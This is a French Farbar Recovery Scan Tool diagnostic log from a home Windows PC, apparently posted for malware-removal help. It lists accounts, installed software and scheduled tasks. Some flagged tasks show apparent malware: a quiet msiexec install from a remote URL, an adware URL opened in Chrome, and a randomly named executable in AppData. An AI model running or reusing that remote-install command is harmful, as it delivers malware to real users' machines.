Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 13.03.2019 Exécuté par Simon (13-03-2019 19:10:42) Exécuté depuis C:\Users\dominique\Desktop Windows 10 Home Version 1803 17134.590 (X64) (2018-06-12 11:12:40) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-1921901940-906816708-456716430-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-1921901940-906816708-456716430-503 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1921901940-906816708-456716430-1003 - Limited - Enabled) Invité (S-1-5-21-1921901940-906816708-456716430-501 - Limited - Disabled) Simon (S-1-5-21-1921901940-906816708-456716430-1001 - Administrator - Enabled) => C:\Users\dominique WDAGUtilityAccount (S-1-5-21-1921901940-906816708-456716430-504 - Limited - Disabled) ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) µTorrent (HKU\S-1-5-21-1921901940-906816708-456716430-1001\...\uTorrent) (Version: 3.5.5.45095 - BitTorrent Inc.) Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 19.010.20098 - Adobe Systems Incorporated) Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.156 - Adobe Systems Incorporated) ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 2.0.8 - ASUS) ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.12 - ASUS) ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 3.05.0001 - ASUS) ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 4.0.2 - ASUS) ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0050 - ASUS) AudioWizard (HKLM-x32\...\{57E770A2-2BAF-4CAA-BAA3-BD896E2254D3}) (Version: 1.0.0.42 - ICEpower a/s) Batman: The Telltale Series (HKLM-x32\...\Batman: The Telltale Series_is1) (Version: - ) BlueStacks App Player (HKLM-x32\...\{88D68911-2F93-4D77-A68D-8A6D9923F55F}) (Version: 2.2.20.6211 - BlueStack Systems, Inc.) Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 6.30.223.228 - Broadcom Corporation) CCleaner (HKLM\...\CCleaner) (Version: 5.50 - Piriform) DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.3.0.0152 - Disc Soft Ltd) Device Setup (HKLM-x32\...\{1F07F2C7-596F-4F34-B805-2C61A3E50E5A}) (Version: 1.0.18 - ASUSTek Computer Inc.) Foxit PhantomPDF (HKLM-x32\...\{FC76E6BB-7CBB-4CD6-8178-3BCADC0526C3}) (Version: 6.0.62.801 - Foxit Corporation) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.121 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden iCloud (HKLM\...\{0493048C-CB1A-44B7-8BB3-8467AF7BA9E4}) (Version: 6.1.2.13 - Apple Inc.) Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1017 - Intel Corporation) Intel(R) Chipset Device Software (HKLM-x32\...\{f5d71765-7cd1-4e68-998f-5b379e725da3}) (Version: 10.0.22 - Intel(R) Corporation) Hidden Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation) Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.0.10100.71 - Intel Corporation) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.38.1036 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4549 - Intel Corporation) Java 8 Update 141 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180141F0}) (Version: 8.0.1410.15 - Oracle Corporation) Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) Microsoft Office 365 - fr-fr (HKLM\...\O365HomePremRetail - fr-fr) (Version: 16.0.11328.20146 - Microsoft Corporation) Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1921901940-906816708-456716430-1001\...\OneDriveSetup.exe) (Version: 19.012.0121.0011 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation) NVIDIA PhysX System Software 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation) NVIDIA Pilote graphique 388.57 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.57 - NVIDIA Corporation) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.11328.20146 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.11328.20146 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.11328.20146 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-040C-0000-0000000FF1CE}) (Version: 16.0.11328.20146 - Microsoft Corporation) Hidden OpenAL (HKLM-x32\...\OpenAL) (Version: - ) OpenOffice 4.1.3 (HKLM-x32\...\{3E1679DA-5081-44AA-B4C2-BF8EE7E107E0}) (Version: 4.13.9783 - Apache Software Foundation) Package de pilotes Windows - ASUS (ATP) Mouse (06/17/2015 6.0.0.66) (HKLM\...\1EFB54678773735560B565BE7FA6F2BCC557EE21) (Version: 06/17/2015 6.0.0.66 - ASUS) Panneau de configuration NVIDIA 388.57 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 388.57 - NVIDIA Corporation) Hidden Pathfinder Kingmaker (HKLM-x32\...\{829364C7-57EB-460B-84D8-9CCD2927675D}_is1) (Version: 1.2.5.0 - Deep Silver) Pathfinder: Kingmaker - Bloody Mess (HKLM-x32\...\1329787908_is1) (Version: 1.1.6d - GOG.com) Pathfinder: Kingmaker - In-Game Pet - Red Panda (HKLM-x32\...\1975006427_is1) (Version: 1.1.6d - GOG.com) Pathfinder: Kingmaker - In-game player's portraits (HKLM-x32\...\1429768868_is1) (Version: 1.1.6d - GOG.com) Pathfinder: Kingmaker - Premium Digital Copy (HKLM-x32\...\1853261348_is1) (Version: 1.1.6d - GOG.com) Pathfinder: Kingmaker - The Wildcards (HKLM-x32\...\2026597518_is1) (Version: 1.1.6d - GOG.com) Pathfinder: Kingmaker (HKLM-x32\...\1982293831_is1) (Version: 1.1.6d - GOG.com) Pathfinder: Kingmaker (HKLM-x32\...\Pathfinder: Kingmaker_is1) (Version: - ) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31233 - Realtek Semiconductor Corp.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.33.529.2014 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7417 - Realtek Semiconductor Corp.) Shadowrun Returns (HKLM-x32\...\GOGPACKSHADOWRUNRETURNS_is1) (Version: 2.0.0.3 - GOG.com) Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.) The Walking Dead A New Frontier Episode 5 (HKLM-x32\...\The Walking Dead A New Frontier Episode 5_is1) (Version: - ) TuxGuitar (HKLM-x32\...\{03534DA5-2F88-4B8E-A978-849B979E1B8F}) (Version: 1.2 - Herac) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{1FD817A6-63E1-4519-BFD4-228DABB7AB6B}) (Version: 2.55.0.0 - Microsoft Corporation) VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN) Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden WIDCOMM Bluetooth Software (HKLM\...\{C6D9ED03-6FCF-4410-9CB7-45CA285F9E11}) (Version: 12.0.0.9840 - Broadcom Corporation) WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 3.0.1 - ASUS) WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) Yesterday Origins version 1.0 (HKLM-x32\...\Yesterday Origins_is1) (Version: 1.0 - Microids) ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) HKU\S-1-5-21-1921901940-906816708-456716430-1001\...\ChromeHTML: -> <==== ATTENTION CustomCLSID: HKU\S-1-5-21-1921901940-906816708-456716430-1001_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6} -> [OneDrive] => {a52bba46-e9e1-435f-b3d9-28daa648c0f6} SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - Pas de fichier SSODL-x32: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - Pas de fichier ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems, Incorporated -> Adobe Systems Inc.) ContextMenuHandlers1: [Foxit_ConvertToPDF] -> {C5269811-4A29-4818-A4BB-111F9FC63A5F} => C:\Program Files (x86)\Foxit PhantomPDF\plugins\ConvertToPDFShellExtension_x64.dll [2013-12-18] (Foxit Corporation -> Foxit Corporation) ContextMenuHandlers1: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2017-01-17] (Apple Inc. -> Apple Inc.) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-02-04] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Pas de fichier ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2016-11-30] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-12-04] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems, Incorporated -> Adobe Systems Inc.) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-02-04] (win.rar GmbH -> Alexander Roshal) ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {0D18792A-F222-44AD-9DC8-A0140E595C17} - System32\Tasks\{0EA2C5F3-0CEA-6707-2E71-684987632C8F} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://thumen.net/cl/?guid=fgfj9t2fsxluck4ph5qolvjiq5jj9y8e&prid=1&pid=4_1324_0 Task: {0D2F9383-D9E0-4479-8CC6-C9822A1CAC23} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION Task: {0DC7B080-CF73-4D4D-BC51-E4D609F03BA5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe (Microsoft Corporation -> Microsoft Corporation) Task: {14577AE2-683A-4661-BC5F-7BC8B6F61B87} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe (Microsoft Corporation -> Microsoft Corporation) Task: {17F5A83E-9EBA-4618-B5AA-7087B2CE9747} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe (Microsoft Corporation -> Microsoft Corporation) Task: {1ACE634F-04A0-4D9F-9D9A-093EB9F91C0E} - System32\Tasks\{747AC1B7-E02A-58C3-BEFB-126FDA638234} => C:\Users\dominique\AppData\Local\zyUEhi.exe (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION Task: {1BB680C0-0489-490D-BDE1-C3425A1C5196} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Pas de fichier <==== ATTENTION Task: {2340E79E-87F5-4868-B99B-0F70BFA493CF} - System32\Tasks\{EF2B5754-C01B-0B1C-5F49-47D575075146} => "msiexec" -q -i hxxps://empiralostwinc.com/vdiojzghyohk.pre <==== ATTENTION Task: {249540A5-9C96-4CD9-B38C-1A96ADA92B62} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated -> Adobe Systems Incorporated) Task: {26BFAFD3-31A7-4D65-B5BD-7697FA5D0D1D} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe (ASUSTeK Computer Inc. -> AsusTek) Task: {2902BDC5-4168-41AD-AFFB-48D8450A13FC} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe (ASUSTeK Computer Inc. -> ASUSTek Computer Inc.) Task: {2B720B73-16F8-47E5-AFEC-BAE8E110B46F} - System32\Tasks\ATK Package A22126881260 => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\SimAppExec.exe (ASUSTeK Computer Inc. -> ASUSTek Computer Inc.) Task: {2BDD8C60-40C5-4B17-AE4C-A4BD3EC15D86} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier <==== ATTENTION Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe Task: {36E27157-D0DB-4D2D-A708-3BCE4417161E} - System32\Tasks\ASUS\ASUS Product Register Service => C:\Program Files (x86)\ASUS\APRP\aprp.exe (ASUSTeK Computer Inc. -> ASUSTek Computer Inc.) [Fichier non signé] Task: {38EA52BF-B8A5-4A3C-984A-19B71F778918} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe (Microsoft Corporation -> Microsoft Corporation) Task: {3CB0C5FD-C647-46A6-8AFD-1032FB2E4067} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd) Task: {3CB496C5-730B-4EB6-A39E-DD232F77593A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software) Task: {48DF8C06-32FD-4FDB-AE7B-07694026B3A5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe (Microsoft Corporation -> Microsoft Corporation) Task: {49B122A1-9662-4784-A6E8-F63AFEEA4653} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION Task: {4A4C3DFF-7079-491F-89BA-82EB77296889} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation) Task: {547E0DCE-0686-442C-9912-6DFCA722FC3F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation) Task: {648A6394-E1E9-459E-A520-88B11645BE6C} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor Corp -> Realtek Semiconductor) Task: {66C761CD-CEF9-48B6-94F5-5B91DEA2ACE5} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe (Microsoft Corporation -> Microsoft Corporation) Task: {6AFEDFF3-E79A-4E4B-89F6-1DD4A7FDB549} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION Task: {70D11860-242A-4E28-B67C-A056853F7E9D} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe (Microsoft Corporation -> Microsoft Corporation) Task: {75D59FC9-3734-4934-B597-4A63B64B3F52} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION Task: {76D8852A-4D47-4FCF-97F1-4A8D35223DF7} - System32\Tasks\Opera scheduled Autoupdate 1543951838 => C:\Users\dominique\AppData\Local\Programs\Opera\launcher.exe Task: {7F6F86C5-0DB6-4FA7-86CF-CD2083F6F1A6} - System32\Tasks\{1E0E0184-0601-4FB1-8696-39F10120FD55} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\NCH Software\Debut\debut.exe" -d C:\Users\dominique\Desktop\Simon Task: {8073FA45-0975-4DCE-B322-A9F35F24C3D3} - System32\Tasks\ATK Package 36D18D69AFC3 => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\SimAppExec.exe (ASUSTeK Computer Inc. -> ASUSTek Computer Inc.) Task: {8903D858-479C-4386-9608-EED17CB3B34A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe (Piriform Software Ltd -> Piriform Software Ltd) Task: {8D69C887-B5F7-4F1F-BEB8-D8511824D630} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_156_Plugin.exe (Adobe Systems Incorporated -> Adobe Systems Incorporated) Task: {9E174535-2ED1-4B48-9E2F-1341E6A7D4F0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.) Task: {ABFE8D22-CE3B-4F3B-AFD0-0E312DB1C092} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION Task: {AE245316-F2D1-4816-A4D0-02E96783B03F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems, Incorporated -> Adobe Systems Incorporated) Task: {AF29F657-BE3B-489F-9984-02087B1FF0D3} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION Task: {C77BA14B-8B4F-40C5-9750-32DE961AA60C} - System32\Tasks\AdobeGCInvoker-1.0-PC-SIMON-Simon => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe (Adobe Systems Incorporated -> Adobe Systems, Incorporated) Task: {C83AB6C3-07FF-4510-B5E0-81338BBBEE3D} - System32\Tasks\AdobeGCInvoker-1.0-pc-dominique-Simon => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe (Adobe Systems Incorporated -> Adobe Systems, Incorporated) Task: {C9CEF7E7-BC39-4EDB-A9D5-D3F61A7893EE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION Task: {D5137E38-D593-4FEF-966C-BCB5673B18F4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION Task: {D58F1FA5-46A4-4CCF-9618-9AF6217CC12A} - \WPD\SqmUpload_S-1-5-21-1921901940-906816708-456716430-1001 -> Pas de fichier <==== ATTENTION Task: {DC20E5A3-4786-4008-9F23-D3C457016A37} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.) Task: {E3ADB2AA-0E48-464F-BA1D-2FAC812C7C4A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation) Task: {EC2CF2DA-8AA7-4F46-A933-A5307B821232} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION Task: {EFE0820E-19C3-48E2-8E75-5D57BFE9E826} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION Task: {F4392834-9657-4654-A8D5-C2E2142B960B} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe (ASUSTeK Computer Inc. -> ASUS) Task: {FDE54327-55DB-4878-9BE7-7FE559B5422A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation) (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) ==================== Raccourcis & WMI ======================== (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) ==================== Modules chargés (Avec liste blanche) ============== 2014-08-20 06:14 - 2014-08-20 06:14 - 000071168 _____ (ASUS Cloud Corporation) [Fichier non signé] C:\Program Files (x86)\ASUS\WebStorage\2.1.11.399\AsusWSWinService.exe 2015-03-17 01:34 - 2015-03-17 01:34 - 000013824 _____ (Adobe Systems Inc.) [Fichier non signé] C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\locale\fr_fr\Acrobat Elements\ContextMenuShim64.fra 2019-02-21 23:37 - 2019-02-21 23:37 - 000084480 _____ (BlueStack Systems, Inc.) [Fichier non signé] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\HD-LogRotatorService\3b2fa3e41b7d9d886e907a6a926d3565\HD-LogRotatorService.ni.exe 2019-02-21 23:37 - 2019-02-21 23:37 - 001574400 _____ (BlueStack Systems, Inc.) [Fichier non signé] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\HD-UpdaterService\6523476cf9131357311c293223bd5292\HD-UpdaterService.ni.exe 2014-11-05 13:44 - 2014-11-05 13:44 - 000163840 _____ (ASUSTeK Computer Inc.) [Fichier non signé] C:\Program Files (x86)\ASUS\Splendid\ColorU.dll 2014-11-05 13:44 - 2014-11-05 13:44 - 000124928 _____ () [Fichier non signé] C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll 2019-02-21 23:34 - 2019-02-21 23:34 - 001644544 _____ (BlueStack Systems, Inc.) [Fichier non signé] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\HD-Agent\4203f87ad35231a287d7e3f641a2a123\HD-Agent.ni.exe 2016-04-21 11:41 - 2016-08-17 04:33 - 003306496 _____ () [Fichier non signé] C:\Program Files (x86)\BlueStacks\libGLESv2.dll 2019-02-21 23:36 - 2019-02-21 23:36 - 000171008 _____ (CodeTitans) [Fichier non signé] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\JSON\f6e6a22365046e71472e30de4fd4c577\JSON.ni.dll 2015-10-01 19:30 - 2015-10-01 19:30 - 000000000 ____LMicrosoft Corporation C:\Program Files (x86)\Microsoft Office\root\Office16\AppVIsvSubsystems32.dll 2015-10-01 19:30 - 2015-10-01 19:30 - 000000000 ____LMicrosoft Corporation C:\Program Files (x86)\Microsoft Office\root\Office16\c2r32.dll 2015-03-17 01:34 - 2015-03-17 01:34 - 000010240 _____ () [Fichier non signé] C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\locale\fr_fr\AcroTray.fra ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) ==================== Association (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) ==================== Hosts contenu: =============================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2013-08-22 14:25 - 2013-08-22 14:25 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) 